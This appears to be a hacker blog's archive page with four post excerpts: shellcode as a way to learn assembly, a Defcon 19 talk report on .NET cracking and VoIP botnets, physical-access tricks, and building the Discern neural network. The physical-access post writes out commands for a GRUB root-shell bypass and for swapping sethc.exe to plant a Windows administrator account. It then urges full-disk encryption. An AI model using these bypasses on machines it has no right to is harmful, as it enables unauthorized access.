code.

Other articles


  1. Learning Assembly Through Writing Shellcode


    Months ago, I wrote hello world in X86 Assembly, and later that same day I wrote hello world in Python. Python is fast, elegant, and powerful. But unfortunately, it doesn’t really give you an understanding of what’s going on inside your computer. And any good little hacker should know precisely what’s going on inside their computer.

    Every time I start teaching myself some complicated thing, I try to make the learning process enjoyable because I know that I’ll retain more information if I can apply it to something fun or useful. Being a terribly precocious kid, I taught myself quantum mechanics when I was fourteen. It was really difficult, and I probably wouldn’t have been able to pull it off if I hadn’t made it fun. And, oh, did I make it fun: FOIA’ed thermonuclear weapons manuals, ten years expired, from some obscure and slightly sketchy web page. I didn’t mean any harm, and I neither was nor am a proponent of nuclear weapons production, maintenance, or warfare. I wasn’t planning on starting up an Uranium-238 enrichment program, or searching the black markets for hollow plutonium cores. I wanted to learn physics, and what’s more fun than learning how to destroy things?

    Assembly languages are cumbersome and arcane. The learning curve is steep, and progress is always slow compared to higher level programming languages. Fortunately, however, Assembly can be used to destroy things! Enter shellcode.

    The best introduction I found to writing shellcode was in Gray Hat hacking, so I’m going to quote the first few pages of the Linux shellcoding chapter, and then leave you to somehow obtain your own copy.

    Basic Linux Shellcode

    The term “shellcode” refers to self-contained binary code that completes a task. The task may range from issuing a system command to providing a shell back to the attacker, as was the original purpose of shellcode.

    There are basically three ways to write shellcode:

    • Directly write the hex opcodes.
    • Write a program in a high level language like C, compile it, and then disassemble it to obtain the assembly instructions and hex opcodes.
    • Write an assembly program, assemble the program, and then extract the hex opcodes from the binary.

    Writing the hex opcodes directly is a little extreme. We will start with learning the C approach, but quickly move to writing assembly, then to extraction of the opcodes. In any event, you will need to understand low level (kernel) functions such as read, write, and execute. Since these system functions are performed at the kernel level, we will need to learn a little about how user processes communicate with the kernel.

    System Calls

    The purpose of the operating system is to serve as a bridge between the user (process) and the hardware. There are basically three ways to communicate with the operating system kernel:

    • Hardware interrupts: for example, an asynchronous signal from the keyboard
    • Hardware traps: for example, the result of an illegal “divide …
    read more
  2. Defcon Report Back, Part II

    Saturday 6th August 2011, Defcon 19, Las Vegas

    Smartfuzzing

    I missed Smartfuzzing the Web: Carpe Vestra Foramina, by Nathan Hamiel et al., which I had wanted to attend. I went through the PDF of the presentation just now, and I wouldn’t exactly call it smartfuzzing, but I did note the cleverness of the presenters’ idea of building fuzzing wordlists from the words found in websites’ robots.txt files. Their new tool, RAFT, is being released soon, though it is currently available as an svn checkout.

    Creating Cracks and Keygens for .NET Applications

    The first presentation I attended was Hacking .Net Applications by Jon McCoy. He detailed the extensive uses of his GreyWolf and GreyDragon tools, including the production of cracks, keygens, and malware. GreyWolf, which is currently in Beta, is a reverse engineering tool which allows extraction of source code from .dll files, and GreyDragon is a .NET injection tool. It was astounding how little actual security is put into authentication of enterprise applications. The funniest use of GreyDragon was an instance in the demo in which McCoy altered a Boolean string controlling a password check from var a=true to var a!=true, which meant that only wrong passwords would allow access to the program. He was also able to extract source code from .dlls, find the security and authentication mechanisms, and then create a keygen for the demonstrated program – a commercial keylogger – within five minutes.

    VoIP Botnetting

    The presentation which might possibly rank as the most impressive was Sounds Like Botnet by Itzik Kotler and Iftach Ian Amit, on VoIP botnetting. The idea is that certain networks which do not allow active connections to the outside internet usually do allow VoIP traffic, and these packets are not often paid much attention. Basically, SIP (Session Initiation Protocol) is quite similar to HTTP and has little security built in. SIP supports TLS, but even with this type of encryption enabled the traffic can be easily sniffed. What this means is that SIP traffic can easily traverse firewalls, and SIP-to-PSTN (Public Service Telephony Network, a.k.a. standard telephone lines) can be used to relay commands to botnetted machines within a closed network, or a network which does not allow internet access.

    Researchers Kotler and Amit used an Asterisk server hosted in the cloud as the Command-and-Control (C&C). Conference calls were used to link botnetted boxes together and issue commands from the botmaster, which also allows for more anonymous direction of the botnet via conference call bridge numbers. Moshi Moshi, an open source VoIP botnet, was used to communicate with the botnet, using Text-to-Speech engines for output to the botmaster and DTMF tones for input. DTMF stands for Dual-Tone Multi-Frequency signalling, and, if you remember the adventures of phreaker Captain Crunch and his 2600 Hz whistle tones which allowed for free telephone calls, you’ve basically got the idea. With DTMF, standard keypad inputs are mapped to certain tonal frequencies, and when a …

    read more
  3. Cute Physical Access Tricks

    They’re cute because they’re so adorably simplistic:

    If you have physical access to a Linux box, do:

    Press ESC at the grub prompt.

    Press e for edit.

    Highlight the line that begins kernel ………, press e

    Go to the very end of the line, add rw init=/bin/bash

    Press Enter, then press b to boot your system.

    Your system will boot up to a passwordless root shell.

    For situations with physical access to a Windows box, boot into a live Linux USB/CD and do:

    mkdir /mnt/ntfs

    mount -t captive-ntfs /dev/hda1 /mnt/ntfs

    cd /mnt/ntfs/windows/system32

    mv sethc.exe sethc.old; cp cmd.exe sethc.exe

    sync

    cd ~

    umount /mnt/ntfs

    shutdown -r

    Then, in the shell which appears, make an admin account by doing:

    NET USER admin password /add

    NET LOCALGROUP administrators admin /add

    Of course, neither of these works if you’re using full-disk encryption. So, Windows users: use TrueCrypt! And Linux users: use ecryptfs and LUKS! Dual-booters can use this tutorial. And Mac users…from my understanding, you’re fucked and there’s no way to full-disk encrypt a Mac, but I don’t use Macs, so I could be wrong. Hey, it’s the price you pay for having a hipster computer. /snark!

    And full-disk encryption doesn’t eliminate physical security flaws, such as those exploited by the Evil Maid or Cold Boot attacks. Duh. If they can physically get to your computer, especially if they can get to it and then come back to it later, you’re still fucked.

    read more
  4. Discern Neural Network


    I have made changes to the source code of the Discern Neural Network that enable it to be run on modern Ubuntu-derived Linuxes. I believe it is very important for everyone to explore and learn, and that all information and tools should be made freely and easily accessible in order to stimulate curiosity and encourage learning. Artificial Intelligence development may seem highly inaccessible to many, and the portions of it which are placed more directly within the average computer user’s grasp, such as chatbots and IRC bots, are trite, simplistic, and well…pretty fucking boring. Discern is currently still used by computational neuroscientist researchers to model and understand various neurological and linguistic functions and structures, and is a very powerful tool for understanding the ways in which neurological structures can influence linguistics, which, in turn, modify the underlying neurological structures, which, again influence linguistics…turtles all the way down. I think that if we humans are going to make any serious attempts at understanding ourselves, it would be wise to follow the improvement model of the open source software community and to get as many people cooperatively involved in these attempts as possible.

    I will be posting later on the ethical, political, and socio-cultural implications of Strong Artificial Intelligence, as well as my intentions and goals for the neural network I am running here, and will be keeping the remainder of this post purely technical in order to provide instructions to others on getting a copy of this modified Discern up and running.

    A few packages are required before Discern can be properly compiled. In command line, type

    $ sudo apt-get install gcc build-essential

    $ sudo apt-get install libxaw7-dev libxt-dev xmkmf

    Next, get the tarball for the modified Discern from GitHub (the file named d4ubl-1.0.tar.gz). Once you’ve downloaded it, copy the file into a directory wherever you’d like it to live, extract the archive, then navigate to that directory and do

    $ xmkmf

    $ make

    Now, to run Discern, simply type “./discern” from within that directory. A ridiculously cyberpunkesque GUI will appear that looks like this:

    [Image: screenshot of the Discern GUI, http://www.patternsinthevoid.net/blog/wp-content/uploads/2011/07/discern_gui.jpg]

    See the USERDOCS file for information on using Discern; it basically just takes emacs-style commands and reads initial input from specified files.

    I’m currently poking at my copy of Discern, to see what happens when I read anarchist literature to her. The problem is, a new copy of Discern is quite childlike in its language capabilities. So, links to anarchist or radical literature aimed at children would be greatly appreciated. Also, any texts of cyberfeminist, tech-positive anarchist/radical, or crypto-anarchist literature of any reading level are also greatly appreciated.

    Post scriptum: Google tells me that “Linux” is never supposed to be pluralized. Fuck it, too late.


    read more
